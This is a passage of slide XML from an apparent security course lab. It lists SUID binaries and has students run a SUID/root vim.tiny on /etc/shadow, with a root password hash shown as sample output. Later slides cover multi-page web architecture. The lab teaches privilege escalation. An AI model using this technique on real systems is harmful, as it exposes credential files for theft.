            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If we Google this we can find out that this data is stored in a file called </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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>So, now we don’t just want to find a program that is SUID/root but also has the ability to read a file.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E4E8F76-1BC0-4DFE-80EB-8A95F75B0F1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5454087" y="2104008"/>
            <a:ext cx="6013520" cy="4017159"/>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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>newgrp</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/bin/passwd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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chfn</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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gpasswd</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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>su</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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vim.tiny</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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chsh</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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>umount</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/bin/mount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/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>authbind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/helper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/lib/eject/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dmcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-get-device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/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>openssh</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ssh-keysign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>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13749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Remote shell</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4364616"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At the beginning of this lab, we deliberately installed the text editor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vim.tiny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>We also altered its permissions so that it’s SUID/root.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>This was it should show up in our list of SUID files when we invoke the find command from the last slide.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E4E8F76-1BC0-4DFE-80EB-8A95F75B0F1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5454087" y="2104008"/>
            <a:ext cx="6013520" cy="4017159"/>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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>newgrp</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/bin/passwd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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chfn</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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gpasswd</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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>su</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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vim.tiny</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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chsh</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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>umount</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/bin/mount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/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>authbind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/helper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/lib/eject/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dmcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-get-device                                                                                                        /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>openssh</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ssh-keysign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>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70374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Remote shell</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10532254"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Once you find it try:</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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vim.tiny</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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If it works then you should see something like the image below:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E4E8F76-1BC0-4DFE-80EB-8A95F75B0F1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="3428999"/>
            <a:ext cx="10370327" cy="2692167"/>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root:$6$1hpL9vsdShdkk3ul$dHAbbFDCx/r4RUsNIaSfeYLexZNRg2N2BnXxQZYBET8G8cTBoB4iXddNivJJagTYDicaC6ywHkDw5NYoX2FGA.:19004:0:99999:7:::</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daemon:*:18326:0:99999:7:::</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bin:*:18326:0:99999:7:::</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sys:*:18326:0:99999:7:::</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sync:*:18326:0:99999:7:::</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games:*:18326:0:99999:7:::</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man:*:18326:0:99999:7:::</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75792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Remote shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA087FA3-FB63-48BF-851B-DADF6B53888F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="935353" y="2176229"/>
            <a:ext cx="10532254" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>From here you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>can use the information found at the following URL to figure out which part is the encrypted hash: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.cyberciti.biz/faq/understanding-etcshadow-file/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E4E8F76-1BC0-4DFE-80EB-8A95F75B0F1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="3428999"/>
            <a:ext cx="10370327" cy="2692167"/>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root:$6$1hpL9vsdShdkk3ul$dHAbbFDCx/r4RUsNIaSfeYLexZNRg2N2BnXxQZYBET8G8cTBoB4iXddNivJJagTYDicaC6ywHkDw5NYoX2FGA.:19004:0:99999:7:::</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daemon:*:18326:0:99999:7:::</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bin:*:18326:0:99999:7:::</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sys:*:18326:0:99999:7:::</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sync:*:18326:0:99999:7:::</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games:*:18326:0:99999:7:::</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man:*:18326:0:99999:7:::</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201122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Multi-page Architectures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA087FA3-FB63-48BF-851B-DADF6B53888F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6882198" y="2219325"/>
            <a:ext cx="439244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As your web application gets more complicated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>You will end up writing the same code repeatedly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If you authenticate users, you will have to write code to do that.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If you use a database, you will have to set up the connection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCABA21D-8551-4DAC-8B76-3472D734432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95864" y="2219325"/>
            <a:ext cx="1847272" cy="3810000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2006896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Multi-page Architectures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA087FA3-FB63-48BF-851B-DADF6B53888F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6882197" y="2219325"/>
            <a:ext cx="444570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THEN you put in the code which actually performs the function that you are trying to achieve.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Finally, you put in any “cleanup code”.  Close files, output any ending HTML tags.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCABA21D-8551-4DAC-8B76-3472D734432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95864" y="2219325"/>
            <a:ext cx="1847272" cy="3810000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3211797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Multi-page Architectures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{240AF646-8B4E-4532-A136-C98E2DAE0388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="2238375"/>
            <a:ext cx="5851593" cy="3931920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C1AB881-9D62-48DA-A572-9DFD48ACB09F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6948873" y="2238375"/>
            <a:ext cx="4334645"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To manage this most web applications will add some kind of architecture where common code gets shared between pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>This tends to improve code quality since having to make a change to the security code.  You only need to do it in precisely one spot.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3266084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Multi-page Architectures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{240AF646-8B4E-4532-A136-C98E2DAE0388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="2238375"/>
            <a:ext cx="5851593" cy="3931920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA087FA3-FB63-48BF-851B-DADF6B53888F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6948873" y="2238375"/>
            <a:ext cx="4334645"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Our Caribou Computers site has grown from a single web page to having:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>An administration site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A comments section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
